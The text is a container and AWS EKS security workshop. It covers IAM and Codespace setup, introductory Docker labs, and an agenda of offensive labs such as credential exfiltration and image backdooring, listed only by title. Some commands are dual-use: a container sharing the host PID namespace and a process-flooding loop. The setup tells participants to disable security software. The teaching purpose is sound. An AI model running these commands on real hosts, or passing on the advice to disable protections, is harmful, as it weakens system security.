Welcome to AWS EKS Security Masterclass


Welcome to EKS Goat: AWS EKS Security Masterclass, a comprehensive and hands-on workshop designed to elevate your understanding of AWS Elastic Kubernetes Service (EKS) security. This immersive course is tailored for security professionals and enthusiasts who seek to gain deep insights into securing containerized environments and EKS clusters on AWS.

Workshop Website

Access the EKS Security workshop content here:
https://ekssecurity.kubernetesvillage.com

Alternate Link

In case of accessibility issues, you can use the following link:
https://ekssecurity.netlify.app/

Authored by Anjali & Divyanshu

Workshop Overview

The EKS Goat: AWS EKS Security Masterclass is an immersive security workshop designed to take participants through real-world scenarios of attacking and defending Kubernetes clusters hosted on AWS EKS.

This workshop provides a comprehensive approach, from understanding the anatomy of attacks on EKS clusters to deploying robust defense mechanisms. Participants will learn how to exploit misconfigurations and vulnerabilities within AWS EKS, followed by the implementation of best security practices to safeguard the environment.

Key Takeaways:

  • Hands-on labs focused on exploiting EKS misconfigurations.
  • Techniques for lateral movement, privilege escalation, and post-exploitation in AWS EKS.
  • Deep dive into securing AWS EKS clusters by leveraging IAM roles, Kubernetes RBAC, and network policies.
  • Best practices for automating vulnerability detection and defense mechanisms in AWS EKS environments.

This workshop is tailored for security professionals, cloud engineers, and DevOps teams looking to enhance their understanding of offensive and defensive Kubernetes security strategies.

About Us:

  • Anjali is a senior cloud security engineer and founder of Kubernetes Village. She has over 5 years of experience in cloud security (GCP, AWS & Azure), DevSecOps (CI/CD), Kubernetes (EKS & GKE), and IaC security. She was a member of the Infosec Girls mentorship program and regularly publishes cloud security research on her YouTube channel @peachycloudsecurity. She was a volunteer at Defcon Cloud Village and currently leads the Bangalore chapter of W3-CS. Additionally, she is an AWS Community Builder. She has delivered training and talks at conferences such as Blackhat Spring'24, Blackhat Europe'23, Bsides Bangalore 2023/2024, CSA Bangalore Annual Summit, C0c0n 2023, Null Community Meetup Bangalore, Google Cloud IAP Security on the Cloud Security Podcast, and Nullcon 2023.

  • Divyanshu is a senior security engineer with more than 7 years of experience in security architecture reviews of cloud, web & cloud pentesting, DevSecOps, automation, and secure code review. He has reported multiple vulnerabilities to companies like Airbnb, Google, Microsoft, AWS, Apple, Amazon, Samsung, Zomato, Xiaomi, Alibaba, Opera, Protonmail, Mobikwik, etc., and received CVE-2019-8727, CVE-2019-16918, CVE-2019-12278, and CVE-2019-14962 for reporting issues. He is the author of Burp-o-mation and a very-vulnerable-serverless application. He is also an AWS Community Builder for security and was a Defcon Cloud Village crew member in 2020/2021/2022. He has given training and talks at events like Nullcon Hyderabad'24, Brucon'24, Blackhat Europe Arsenal'23, C0c0n'24, Nullcon Goa'24, Bsides Bangalore'23, Parsec IIT Dharwad, and the Null community. He was awarded the title of Cloud Security Champion at CSA Bangalore'23 and Cybersecurity Samurai at Bsides Bangalore'23.

Contact Us

Excited About the Class:

🚨🚨

⚠️ IMPORTANT NOTICE: Please use a new or dedicated AWS account for these operations. Some commands may delete data or resources within the AWS environment. The author assumes no responsibility for any data loss or unintended consequences resulting from the use of these commands.

⭐⭐⭐⭐⭐

Introduction

As organizations increasingly adopt microservices and distributed architectures, ensuring the security of Kubernetes environments becomes critical. This course introduces participants to the essential concepts of container and Kubernetes security, with a focus on AWS EKS. You will learn about common vulnerabilities, tools, and techniques for attacking and securing applications within EKS clusters. The course will also guide you through security audits, leveraging industry best practices, tools, and custom scripts to evaluate and enhance the security posture of your Kubernetes deployments.

Throughout the course, real-world examples from penetration testing engagements will be shared, bridging the gap between theoretical knowledge and practical application. By the end of this training, you will be well-equipped to identify, exploit, and secure applications running in AWS EKS clusters.

Prerequisite (Mandatory)

  • GitHub Codespace Setup: Use GitHub Codespace to set credentials and deploy infrastructure for learning.
  • Bring Your Own AWS Account: Participants must bring their own AWS account with billing enabled and admin privileges.
  • Bring Your Laptop: Ensure you have your laptop ready for hands-on activities.

Takeaways

  • In-depth Hands-on Training: Led by experienced professionals in AWS & EKS Security.
  • Extended Lab Access: Enjoy access to course content after the class to reinforce your learning.
  • Real World Scenario: Test your skills with a real-world vulnerable scenario leading to AWS EKS exploitation.
  • Comprehensive Course Materials: Receive a training presentation covering all the content discussed during the course.

Disclaimer

  • The information, commands, and demonstrations presented in this course, AWS EKS Red Team Masterclass - From Exploitation to Defense, are intended strictly for educational purposes. Under no circumstances should they be used to compromise or attack any system outside the boundaries of this educational session unless explicit permission has been granted.

    • This course is provided by the instructors independently and is not endorsed by their employers or any other corporate entity. The content does not necessarily reflect the views or policies of any company or professional organization associated with the instructors.
  • Usage of Training Material: The training material is provided without warranties or guarantees. Participants are responsible for applying the techniques or methods discussed during the training. The trainers and their respective employers or affiliated companies are not liable for any misuse or misapplication of the information provided.

  • Liability: The trainers, their employers, and any affiliated companies are not responsible for any direct, indirect, incidental, or consequential damages arising from the use of the information provided in this course. No responsibility is assumed for any injury or damage to persons, property, or systems as a result of using or operating any methods, products, instructions, or ideas discussed during the training.

  • Intellectual Property: This course and all accompanying materials, including slides, worksheets, and documentation, are the intellectual property of the trainers. They are shared under the Apache License 2.0, which requires that appropriate credit be given to the trainers whenever the materials are used, modified, or redistributed.

  • References: Some of the labs referenced in this workshop are based on open-source materials available at Amazon EKS Security Immersion Day GitHub repository, licensed under the MIT License. Additionally, modifications and fixes have been applied using AI tools such as Amazon Q, ChatGPT, and Gemini.

  • Educational Purpose: This lab is for educational purposes only. Do not attack or test any website or network without proper authorization. The trainers are not liable or responsible for any misuse.

  • Usage Rights: Individuals are permitted to use this course for instructional purposes, provided that no fees are charged to the students.

Credits

Reach out in case of missing credits.

❗❗ ⚠️ IMPORTANT NOTICE: Please use a new or dedicated AWS account for these operations. Some commands may delete data or resources within the AWS environment. The author assumes no responsibility for any data loss or unintended consequences resulting from the use of these commands. ❗❗

⭐⭐⭐⭐⭐

Agenda

Workshop Overview

This workshop provides participants with a deep dive into securing and defending AWS EKS. The session begins with a foundational understanding of Kubernetes and AWS EKS terminologies, followed by hands-on labs simulating real-world attack scenarios and defense strategies. Participants will learn how to exploit vulnerabilities within an EKS cluster and how to mitigate these threats effectively.

The workshop is designed to cover both offensive techniques (exploiting vulnerabilities) and defensive strategies (hardening and monitoring). By the end of the session, participants will gain practical experience in safeguarding applications running in AWS EKS environments.

Key Components

Container Security Overview

  • Introduction to Docker
    • Lab: Understanding Docker Images and Layers
    • Docker Namespaces and Control Groups (CGroups)
    • Lab: Docker Secrets
  • Static Analysis of Docker Containers (SAST)
    • Lab: Using Dockle and Hadolint
    • Lab: Audits with AquaSecurity Docker Bench Security

AWS Elastic Container Registry (ECR) Overview

  • Lab: AWS ECR Image Scanning
  • Lab: AWS ECR Immutable Image Tag

AWS EKS Fundamentals

  • Lab: Deploying a Vulnerable AWS EKS Infra
    • Kubernetes Architecture
    • AWS EKS Terminologies
    • EKS Authentication & Authorization
  • Lab: Exploiting the Sample Application
    • Lab: Enumerate & Exploit Web Application for Vulnerability
    • Lab: Using IMDSv2 to Exfiltrate Credentials
    • Lab: Enumerate ECR Repositories Using Credentials
    • Lab: Backdooring a Docker Image
    • Lab: Exploiting AWS EKS Cluster
    • Lab: Breaking Out from Pod to Node
    • Lab: Privilege Escalation & S3 Exploitation
    • Lab: Cleanup EC2 Instance

Automated Scanning in EKS

  • Lab: Scanning Using Kubescape
  • Lab: Scanning Using Kubebench

Defense & Hardening in EKS

  • Lab: Pod Security Context
  • Lab: Using CEL for Policy Enforcement via Kyverno
  • Lab: AWS GuardDuty for Threat Detection
  • Lab: Runtime Security with eBPF Tetragon
  • Lab: Destroy EKS Vulnerable Infra

Hands-On Labs

Participants will engage in the following hands-on labs:

  • Exploiting Sample Applications: Simulating real-world attacks by identifying and exploiting web application vulnerabilities within the EKS environment.
  • Using IMDSv2: Extract AWS credentials via metadata service vulnerabilities.
  • Backdooring Docker Images: Injecting malicious code into Docker images and deploying it within EKS.
  • EKS Cluster Exploitation: Identify and exploit misconfigurations in the EKS environment.
  • Pod to Node Breakout: Gaining unauthorized access to the underlying node from a compromised pod.
  • Privilege Escalation and S3 Exploitation: Escalating privileges and compromising sensitive data stored in S3.

Learning Objectives

  • Gain a deep understanding of AWS EKS security concepts.
  • Learn how to exploit vulnerabilities and misconfigurations in AWS EKS clusters.

Outline

  • Lab Environment Setup:

    • Lab: Setup AWS IAM User
    • Lab: Setup GitHub Codespace
    • Lab: Deploying a Vulnerable AWS EKS Infra
  • Introduction to AWS EKS:

    • Theory: Kubernetes Architecture Overview
    • Theory: AWS EKS Terminologies
    • Theory: EKS Authentication & Authorization
  • Lab: Exploiting the Sample Application:

    • Lab: Enumerating & Exploiting a Web Application Vulnerability
    • Lab: Using IMDSv2 to Exfiltrate Credentials
    • Lab: Exploiting ECR by Backdooring a Docker Image
    • Lab: Exploiting AWS EKS Cluster
    • Lab: Breaking Out from Pod to Node
    • Lab: Privilege Escalation & S3 exploitation for flag

⭐⭐⭐⭐⭐

Prerequisites

  • GitHub Codespace Setup (Mandatory): Set up GitHub Codespace to deploy the required infrastructure for hands-on labs.
  • New AWS Account (Mandatory): Bring your own new AWS account with billing enabled and administrative privileges.
    • Please use a new or dedicated AWS account for these operations. Some commands may delete data or resources within the AWS environment.
  • Laptop (Mandatory): Bring a laptop with an updated OS and a stable internet connection for lab exercises.
  • Browser (Mandatory): A modern browser such as Firefox or Chrome installed.
  • Basic Knowledge: Familiarity with Kubernetes and AWS services is recommended.
  • Administrator Access: Ensure administrator access on the laptop so you can disable any security solution that hinders lab access via the browser.
  • VPN Disabled: Disable any VPNs to avoid connectivity issues while accessing the Codespace endpoint.
  • Security Software: Permission to disable security solutions during the lab if they block access to external applications.

Lab Access (Only for Public Workshops):


Revision:

  • Updated Audits with Docker Bench Security

❗❗ ⚠️ IMPORTANT NOTICE: Please use a new or dedicated AWS account for these operations. Some commands may delete data or resources within the AWS environment. The author assumes no responsibility for any data loss or unintended consequences resulting from the use of these commands. ❗❗

⭐⭐⭐⭐⭐

AWS EKS Basics


In this section, learners take a practical approach to getting started with AWS EKS, with an emphasis on containers, basic EKS components, and security testing. The lab-based approach gives newcomers a strong foundation in containers and EKS, covering both the theory and the practice of securing, deploying, and managing containerized applications on AWS.

Preparing the Environment for Lab Setup


This guide covers the following steps:

  • Setting up an IAM User in AWS
  • Configuring Admin credentials for the IAM User
  • Setting up the GitHub repository and GitHub Codespace for the lab
  • Instructions to deploy an mdbook
  • Steps to deploy a vulnerable EKS cluster for the lab scenarios
  • Comprehensive guide to learn and perform the entire lab scenario for AWS EKS security.

Lab: Setup AWS IAM User for Lab


Step-by-Step Guide to Set Up an IAM User with Admin Credentials for mdbook using AWS Console

Skip this step if the admin user is already set up and the access keys are readily available for the lab.

  1. Log in to AWS Management Console

    • Go to AWS Console.
    • Log in using your root or IAM account with administrative privileges.


    Disclaimer: Use of the root account is only for setting up the admin user. If an administrative user already exists, this step can be skipped. Avoid using the root account for regular operations.

  2. Navigate to IAM

    • In the AWS console, search for IAM (Identity and Access Management) and click on it.


  3. Create a New IAM User

    • In the IAM Dashboard, click on Users from the left panel, then click Add user.

    • Enter a User name (e.g., admin).

      • Also select Provide user access to the AWS Management Console.

      • Enter a custom password.

  4. Set User Permissions

    • Under Select AWS access type, check the box for Programmatic access.
    • For Set permissions, select Attach policies directly and then search for AdministratorAccess.
    • Check the AdministratorAccess policy to grant full admin privileges.


  5. Review and Create

    • Review the user details and click Create user.


  6. Download Access Keys

    • Once the user is created, you will see Access key ID and Secret access key. Download these credentials by clicking Download .csv file or copy them for later use. These credentials will be needed to configure the mdbook.


    If the admin user is already set up, follow the next steps to create access keys for the admin user.

  7. Setup IAM Access Keys for Admin User

    • Go to the AWS Console, then log in using the admin user which is set up for this lab.

    This can be a separate user, used only for the AWS EKS security lab.

  8. Navigate to IAM

    • In the AWS console, search for IAM (Identity and Access Management) and click on it.
    • In the IAM Dashboard, click on Users from the left panel, then select the user (e.g., admin) that was set up for this lab.

    • Scroll down and click on the Security credentials tab.

    • In the Access keys section, click Create access key, select the Command Line Interface (CLI) use case, tick the confirmation checkbox, and click Next.

    • Fill in the description (optional) and click Create access key.

  9. Configure IAM User in GitHub Codespace

    • Use the Access key ID and Secret access key to configure access in your GitHub Codespace for deployment purposes.

Notes:

  • Ensure to store the access keys securely. They will be used to interact with AWS services programmatically, including setting up and deploying resources for the mdbook.
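
For reference, the same admin user and access keys can also be created from the AWS CLI if you already have an admin session configured elsewhere. A minimal sketch (the user name admin matches the console steps above; these are standard AWS CLI IAM calls):

    # Create the IAM user (skip if it already exists)
    aws iam create-user --user-name admin

    # Attach the AdministratorAccess managed policy
    aws iam attach-user-policy --user-name admin \
      --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

    # Generate an access key pair; note the AccessKeyId and SecretAccessKey
    aws iam create-access-key --user-name admin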

Refer to this video for detailed walkthrough


Setup GitHub Codespace for Deployment


Step-by-Step Guide to Set Up GitHub Codespace from Browser

  • Log in to GitHub

  • Fork the Repository


    Disclaimer: The labs and repository used in this setup may vary depending on the session. Different environments and configurations are used for various sessions. Always ensure you're working with the correct repository and instructions for your specific session.

    • In the top-right corner, click the Fork button to create a copy of the repository in your GitHub account.


  • Open the Forked Repository in Codespace

    • Go to your forked version of the repository in your GitHub account.


    • Click the Code button, then select the Codespaces tab.

    • Choose New Codespace or Create Codespace on main (or any branch you're working on).


  • Wait for Initialization

    • The Codespace will initialize, setting up a virtual development environment.


    • Once ready, you will be directed to a VSCode-like environment where you can develop and test your project.


  • Configure Your Environment

    • Ensure all necessary dependencies for the project are installed by following the repository’s setup instructions.
    • Follow Post Codespace Setup: Terminal Commands mentioned below.
      • Once the Codespace setup is complete, perform the following steps from the terminal:

        1. Navigate to the project directory
          Run the command:
        ls
        cd eks/
        


        2. Make the pre-deployment script executable
          Use the following command:
        chmod +x pre-deploy.sh
        


        3. Run the pre-deployment script
          Execute the pre-deployment script to prepare the environment:
        source pre-deploy.sh
        


        These steps will help you prepare the environment and deploy your project as part of the lab setup. This will take up to 10 minutes.

Patience is a virtue!

  • Setup AWS Credentials

    • Copy the credentials from AWS Console.

    If a CSV of credentials was downloaded earlier, copy the credentials from the CSV. This credentials file must be stored securely.

    • Use the terminal in Codespace to set up the AWS CLI.
    aws configure
    


    Enter the access key, secret key, region & output format.

    • Validate the credentials via aws sts get-caller-identity.
    aws sts get-caller-identity
    


Refer to this video for detailed walkthrough


  • The next step is to deploy the vulnerable scenario for learning; proceed to the next lesson.

Introduction to Docker

What is Docker?

  • Docker is a tool that helps you package and run applications in a special environment called a container.
  • Think of a container as a box that holds everything your application needs to run—code, libraries, and settings—so it works the same everywhere.

Why Use Docker?

  • Consistency: Ensures your application works the same on all machines.
  • Simplifies Deployment: Makes it easy to share and deploy applications.
  • Resource Efficiency: Uses less system resources compared to virtual machines.
  • Scalability: Easily scale up or down by running more or fewer containers.

Containers vs. Virtual Machines

Containers:

  • Lightweight: Share the host system's operating system.
  • Fast Startup: Launch in seconds.
  • Resource-Efficient: Use less memory and storage.

Virtual Machines:

  • Heavyweight: Include a full guest operating system.
  • Slower Startup: Take minutes to boot.
  • Isolated: Better security due to complete separation.

Advantages and Disadvantages of Docker

Advantages:

  • Solves Dependency Issues: Packages all dependencies with the app.
  • Cross-Platform: Runs on Windows, macOS, and Linux.
  • Scalable: Easily handle increased load by adding more containers.
  • Efficient Resource Use: No need for extra OS overhead.

Disadvantages:

  • Limited GUI Support: Not ideal for applications with graphical interfaces.
  • Windows Support: Not as robust as Linux support.
  • Security Concerns: Less isolated than virtual machines.
  • Requires Host OS: Can't run directly on hardware without an OS.

Docker Architecture

  • Docker uses a client-server architecture:

Components:

  • Docker Client (CLI): The command-line tool you use to interact with Docker.
  • Docker Daemon (Server): Runs in the background and does the heavy lifting (building, running, and distributing containers).
  • Docker Registry: Stores Docker images (e.g., Docker Hub).
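
A quick way to see this split in practice: the CLI and the daemon report themselves separately. A small sketch:

    # Client and Server (daemon) versions are listed as separate sections
    docker version

    # Daemon-side details such as storage driver and cgroup version
    docker info

If the daemon is not running, docker version still prints the Client section and then reports that it cannot reach the Server, which makes the client-server boundary obvious.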

Getting Started with Docker

Step 1: Install Docker

  • Windows/macOS: Download from Docker's official website.
  • Linux: Use your package manager (e.g., sudo apt install docker.io for Ubuntu).

Step 2: Verify the Installation

docker --version

Step 3: Run Your First Container

docker run hello-world

Step 4: Understand Docker Images and Containers

  • Image: A snapshot of an application and its environment.
  • Container: A running instance of an image.

Step 5: Pull an Image from Docker Hub

docker pull python:3.8-slim

Step 6: Run a Container in Detached Interactive Mode

docker run -itd python:3.8-slim bash

The -d flag keeps the container running in the background so the later steps can inspect it.

Step 7: Enter and Exit the Container

  • Open a shell in the running container with docker exec -it <container-id> bash, then type exit or press Ctrl+D to leave; the container itself keeps running.

Step 8: List Running Containers

docker ps

Step 9: Stop and Remove Containers

  • Stop a Container:
docker stop $(docker ps -q --filter "ancestor=python:3.8-slim")
  • Remove a Container:
docker rm $(docker ps -a -q --filter "ancestor=python:3.8-slim")

Step 10: Remove Images

docker rmi python:3.8-slim

Conclusion

  • Docker simplifies the process of developing, shipping, and running applications by using containers. It's a valuable tool for both developers and system administrators, making applications more portable and efficient.

Additional Resources

Container Security

What is Container Security?

Container security is about protecting applications running inside containers and their infrastructure from risks like vulnerabilities, misconfigurations, or attacks. It ensures that containers and the systems hosting them are secure from potential threats.

Unlike traditional applications, containers operate differently, requiring tailored security approaches:

  • Complex Architecture: Containers often host microservices, which are smaller, interconnected components, making the system more complex than traditional monolithic applications.
  • Cluster Deployment: Containers are usually deployed across multiple servers, unlike single-server applications.
  • Additional Layers: Container environments include tools like orchestrators and runtimes, adding more security layers.
  • Different Processes: Containers often follow immutable infrastructure principles, meaning they are replaced rather than updated, which changes how security is managed.

Key Areas of Container Security

To fully secure containerized applications, you need to protect several components:

  1. Container Images:

    • These are the blueprints for creating containers. Vulnerabilities in images could allow attackers to exploit them.
    • Regularly scan images for risks and avoid using untrusted sources.
  2. Container Repositories:

    • These host container images. A breach here could result in malicious images being distributed.
    • Secure repositories with strong access controls and scanning tools.
  3. Container Runtimes:

    • These convert images into running containers. Vulnerabilities in runtimes could lead to unauthorized access or control.
    • Use updated and secure container runtimes.
  4. Container Hosts:

    • The physical or virtual machines running containers. Weak server configurations or outdated systems can expose containers to risks.
    • Keep host systems patched and use minimal configurations.
  5. Orchestrators:

    • Tools like Kubernetes that manage containers across servers. Misconfigurations or weak access controls here can expose entire container clusters.
    • Secure orchestrators with proper role-based access controls (RBAC).

Challenges in Container Security

Containerized applications face unique threats:

  1. Large Attack Surface:

    • Organizations may deploy thousands of containers. A flaw in any one container can lead to a breach.
  2. Rapid Changes:

    • Containers are frequently updated or replaced, sometimes daily. This rapid pace increases the likelihood of security gaps.
  3. Third-Party Risks:

    • Containers often rely on images or libraries from open-source sources. If these resources are insecure, they can introduce vulnerabilities.

Best Practices for Container Security

  1. Image Security:

    • Use trusted sources and regularly scan images for vulnerabilities.
    • Avoid unnecessary libraries or tools in images to reduce risk.
  2. Secure Configurations:

    • Follow security best practices for hosts, orchestrators, and runtimes.
    • Limit container privileges (e.g., avoid running containers as root); see the Dockerfile sketch after this list.
  3. Monitor and Update:

    • Continuously monitor container activity for unusual behavior.
    • Keep all tools, images, and host systems updated.
  4. Supply Chain Security:

    • Verify the integrity of third-party libraries and dependencies.
    • Use tools to manage and monitor the software supply chain.
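
As an illustration of the "avoid running containers as root" practice above, here is a minimal Dockerfile sketch that creates and switches to an unprivileged user (image, user, and group names are arbitrary placeholders):

    # Start from a small base image
    FROM alpine:latest

    # Create an unprivileged group and user (names are placeholders)
    RUN addgroup -S app && adduser -S -G app app

    # Drop root: everything from here on runs as the app user
    USER app

    # Print the effective user to confirm we are not root
    CMD ["id"]

Building and running this image should print a non-root UID, whereas the same image without the USER instruction would report uid=0(root).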

Lab: Understanding Docker Images and Layers


Image Credit: https://www.linkedin.com/pulse/understanding-docker-layers-efficient-image-building-majid-sheikh/

Objectives

  • Understand what Docker images and layers are
  • Learn how to create and inspect Docker images using Dockerfile
  • Explore the concept of layers using Docker commands

Key Concepts

What is a Docker Image?

  • A Docker image is a blueprint/template used to create Docker containers
  • It is static and stored as layers
  • Think of it like a recipe: the instructions (layers) define how the image works

What is a Docker Layer?

  • A layer is a set of instructions in the Dockerfile
  • Each command in a Dockerfile adds a layer to the image
  • Layers make Docker images efficient by reusing unchanged layers


Image Credit: https://www.linkedin.com/pulse/understanding-docker-layers-efficient-image-building-majid-sheikh/

Hands on Lab

Create a Docker image for running curl

  • Create a new folder for the project:

    cd /workspaces/ecr_eks_security_masterclass_public/
    mkdir docker-lab && cd /workspaces/ecr_eks_security_masterclass_public/docker-lab
    
  • Create a Dockerfile:

    cat << EOF > Dockerfile
    # Start with a minimal Alpine Linux image
    FROM alpine:latest
    
    # Install curl
    RUN apk update && apk add curl
    
    # Set default command
    CMD ["curl", "--help"]
    EOF
    
  • Build the Docker image with a tag:

    docker build -t mycurl .
    
  • Verify the image is created:

    docker images
    

Inspect Layers in the Docker Image

  • Check the layers of your image:

    docker history mycurl
    
  • Notice how each instruction in the Dockerfile corresponds to a layer

  • Run the container using the image:

    docker run mycurl
    

Modify and Rebuild the Dockerfile

  • Change the default command to print the version of curl

  • Open the Dockerfile:

    cat << EOF > Dockerfile
    # Start with a minimal Alpine Linux image
    FROM alpine:latest
    
    # Install curl
    RUN apk update && apk add curl
    
    # Set default command
    CMD ["curl", "--version"]
    EOF
    
  • Rebuild the image:

    docker build -t mycurl .
    

Reuse Layers for Efficiency

  • Check the image build logs:

    docker build -t mycurl .
    
  • Observe which steps were reused.

  • Run the curl command via docker.

    docker run mycurl
    

Explore Image Layers with Dive Tool (Optional)

  • Install Dive:

    wget https://github.com/wagoodman/dive/releases/download/v0.12.0/dive_0.12.0_linux_amd64.deb
    sudo apt install ./dive_0.12.0_linux_amd64.deb
    
  • Analyze the image:

    dive mycurl
    
  • Explore the layers and their sizes.

  • Use inspect to retrieve metadata and configuration details about the mycurl image.

     docker inspect mycurl
    

Push the Image to Docker Hub (Optional)

  • Log in to Docker Hub.

You will be prompted to enter your Docker Hub username and password.

docker login
  • Tag the image:

    docker tag mycurl <your-dockerhub-username>/mycurl:1.0
    
  • Push the image:

    docker push <your-dockerhub-username>/mycurl:1.0
    

Summary

  • Docker images consist of layers, with each layer representing a command in the Dockerfile
  • Layers enable efficiency by caching unchanged parts of the image
  • Tools like Dive help visualize layers for better understanding

Tasks

  • Modify the Dockerfile to install and run a different tool (e.g., htop)
  • Inspect and explore the layers of your new image using docker history and dive

Lab: Docker Namespaces and Control Groups (Cgroups)


Image Credit: https://medium.com/@mrdevsecops/namespace-vs-cgroup-60c832c6b8c8

What Are Namespaces?

  • Definition: Namespaces are a feature in the Linux kernel that isolate various aspects of system resources. They ensure that processes in one namespace are independent and invisible to processes in another.
  • Purpose: To provide isolation, creating a self-contained environment for processes, which is a core part of containerization.

Real-World Example:

Imagine a hotel with multiple rooms. Each room is isolated with its own keys, furniture, and guests. Guests in one room cannot directly interact with another room. Similarly, namespaces isolate processes within their "container rooms."

Types of Namespaces:

  1. PID Namespace (Process IDs):

    • Isolates process IDs.
    • Each container has its own process numbering, starting from PID 1.
    • Example: A container's process may appear as PID 1 inside the container but could be PID 1000 on the host.
  2. Network Namespace:

    • Provides isolated networking for containers.
    • Each container can have its own virtual network interface, IP address, and routing.
    • Example: A container might have a private IP (e.g., 192.168.1.10) while the host uses 10.0.0.1.
  3. Mount Namespace:

    • Controls file system access and isolation.
    • Containers can have specific mount points without seeing or affecting the host's mounts.
    • Example: A container may only access /app without visibility into /home on the host.
  4. User Namespace:

    • Separates user IDs and group IDs between host and container.
    • A user can appear as root (UID 0) inside a container but remain a regular user on the host.
    • Example: Running a containerized app as root inside the container without elevated privileges on the host.
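
Namespaces are a kernel feature rather than a Docker feature, so you can try one without any container runtime. A minimal sketch using the util-linux unshare tool (requires root):

    # Start a shell in fresh PID and mount namespaces; remounting /proc
    # makes ps show only processes inside the new namespace.
    sudo unshare --pid --fork --mount-proc sh -c "ps -ef"

Compared with ps -ef on the host, only a couple of processes are visible, and the shell itself appears as PID 1, exactly like a container's entrypoint.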

What Are Control Groups (Cgroups)?


Image Credit: https://medium.com/@mrdevsecops/namespace-vs-cgroup-60c832c6b8c8

  • Definition: Cgroups are another Linux kernel feature that manages resource allocation and limits for processes.
  • Purpose: To prevent one container from monopolizing system resources (like CPU, memory, or disk I/O).

Real-World Example:

Think of a shared gym in an apartment complex. Each apartment (container) gets a fixed time slot (CPU) and limited equipment usage (memory). This prevents one tenant from hogging all the resources.

Key Cgroup Features:

  1. Memory Limiting:

    • Sets a maximum memory a container can use.
    • Example: A container limited to 512MB of RAM cannot use more, even if the host has more memory.
  2. CPU Throttling:

    • Restricts CPU usage for a container.
    • Example: A container assigned 50% of CPU will use only half of a core.
  3. Process Limits:

    • Controls the number of processes a container can run.
    • Example: A container allowed to spawn only 10 processes cannot create the 11th process.
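
Inside a container, these limits show up as ordinary files in the cgroup filesystem. A quick sketch (the path assumes a cgroup v2 host; on cgroup v1 the equivalent file is /sys/fs/cgroup/memory/memory.limit_in_bytes):

    # Run a memory-limited container and read the limit back from the cgroup fs
    docker run --rm --memory=256m alpine cat /sys/fs/cgroup/memory.max

The command should print 268435456 (256 MB in bytes), confirming that the --memory flag is enforced via cgroups.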

Why Are Namespaces and Cgroups Important?

  • Isolation: Namespaces ensure processes and resources are kept separate, mimicking virtual environments.
  • Resource Control: Cgroups ensure fair allocation of system resources, avoiding scenarios where one container affects others.

Hands on Lab

Explore Namespaces

  • Open a terminal and list namespaces for the current process:

    ls -l /proc/self/ns
    
  • Observe the types of namespaces available.

  • Start a basic container:

    docker run --rm -it alpine sh
    
  • Inside the container, check process IDs:

    ps -ef
    
  • Get and list the namespaces of a container's main process:

  • Now, execute the following script to inspect the namespaces of running containers:

    docker ps -q | while read container_id; do
        pid=$(docker inspect -f '{{.State.Pid}}' "$container_id")
        if [ -d "/proc/$pid/ns" ]; then
            ls -l "/proc/$pid/ns"
        else
            echo "Namespace for PID $pid not found"
        fi
    done
    
  • Observe how the namespace IDs differ between the host and the container, ensuring isolation.

Share Namespaces Between Host and Container

  • Run a container sharing the host's process namespace:
    docker run --rm -it --pid=host alpine sh
    
  • Inside the container, list processes:
    ps aux
    
  • Notice how the processes from the host are visible inside the container.

Explore Cgroups

  • Run a container with a process limit.

    docker run --rm --pids-limit 2 alpine sh -c "while true; do sleep 1 & done"
    

Observe how the container prevents you from creating more processes.

  • Run a container with memory and CPU limits:

    docker run --rm --memory=256m --cpus="0.5" alpine sh -c "yes > /dev/null"
    
  • Open another terminal and monitor the resource usage:

    docker stats
    

Observe how resource usage is constrained within the defined limits.

Summary

  • Namespaces provide isolation, allowing each container to operate as if it has its own environment.
  • Cgroups manage resources, ensuring containers don't exhaust system resources.
  • These features are essential to Docker's lightweight virtualization.

Additional Reference:

  • https://medium.com/@mrdevsecops/namespace-vs-cgroup-60c832c6b8c8

Lab: Docker Secrets

What Are Docker Secrets?

  • Docker secrets securely store sensitive information like passwords, API keys, or certificates.
  • They allow secure access to secrets in running containers without hardcoding sensitive data into the container or its configuration.

Hands on Lab

  • Change to the working directory.

    cd /workspaces/ecr_eks_security_masterclass_public/docker-lab
    
  • Docker Swarm mode must be initialized. Run the following to initialize if not already done.

    docker swarm init
    
  • Create a file with a secret value.

    echo "mySuperSecretPassword123" > secret.txt
    
    • This file contains the secret that will be securely stored in Docker.
  • Add this file as a Docker secret.

    docker secret create my_secret secret.txt
    
    • Replace my_secret with your chosen name for the secret.
    • You should see a confirmation message showing the secret’s ID.
  • List all secrets in your Docker Swarm to verify.

    docker secret ls
    

Note that the secret content is not visible, ensuring secure handling.

  • Create a service that uses the secret.
    docker service create --name secret_service --secret my_secret alpine sleep 300
    

This command creates a service called secret_service that uses the my_secret secret.

The container runs alpine and sleeps for 300 seconds, giving time to inspect it.

  • Verify the service is running.

    docker service ls
    
  • Get the container ID of the service.

    docker ps -q --filter "name=secret_service"
    
  • Read the secret from inside the container.

    docker exec -it $(docker ps -q --filter "name=secret_service") cat /run/secrets/my_secret
    

The secret content should be displayed securely inside the container.

Cleanup

  • Remove the service

    docker service rm secret_service
    
  • Remove the secret.

    docker secret rm my_secret
    
  • Delete the temporary secret file from your system:

    rm secret.txt
    

Static Analysis of Docker Containers (SAST)

What is Static Analysis (SAST) for Docker Containers?

  • Static Analysis Security Testing (SAST) inspects container images for vulnerabilities and misconfigurations.
  • It analyzes the container's code, configurations, and dependencies without running the container.

What Does SAST Analyze in Docker Containers?

  • Dockerfile: Checks for insecure instructions like using latest tags or running as root.
  • Base Images: Scans the operating system and libraries in the base image for vulnerabilities.
  • Dependencies: Analyzes libraries and tools installed inside the container for outdated or insecure versions.
  • Exposed Ports: Identifies unnecessarily exposed ports that could widen the attack surface.
  • Secrets and Sensitive Data: Detects hardcoded secrets like API keys or passwords inside container layers.
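
To make these checks concrete, the following deliberately insecure Dockerfile sketch packs several of the issues above into a few lines (all values are made up for illustration):

    # Unpinned base image: "latest" can change underneath you
    FROM ubuntu:latest

    # Hardcoded secret baked into an image layer
    ENV API_KEY=example-not-a-real-key

    # Unnecessarily exposed port widens the attack surface
    EXPOSE 22

    # No USER instruction, so the container runs as root by default
    CMD ["bash"]

Linters and scanners such as the ones used in the labs below should flag the unpinned tag, the credential in an environment variable, and the missing USER instruction.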

Common Tools for SAST in Docker Containers

  • Trivy: Open-source tool that scans container images for vulnerabilities.
  • Docker Scan: Built-in Docker CLI tool powered by Snyk for security analysis.
  • Anchore: Comprehensive container scanning platform.
  • Clair: Static vulnerability analysis tool for container images.
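
As a quick taste of these tools, Trivy can scan a local or remote image with a single command (a sketch; see the Trivy project page for installation):

    # Scan an image and report only the more serious findings
    trivy image --severity HIGH,CRITICAL nginx:latest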

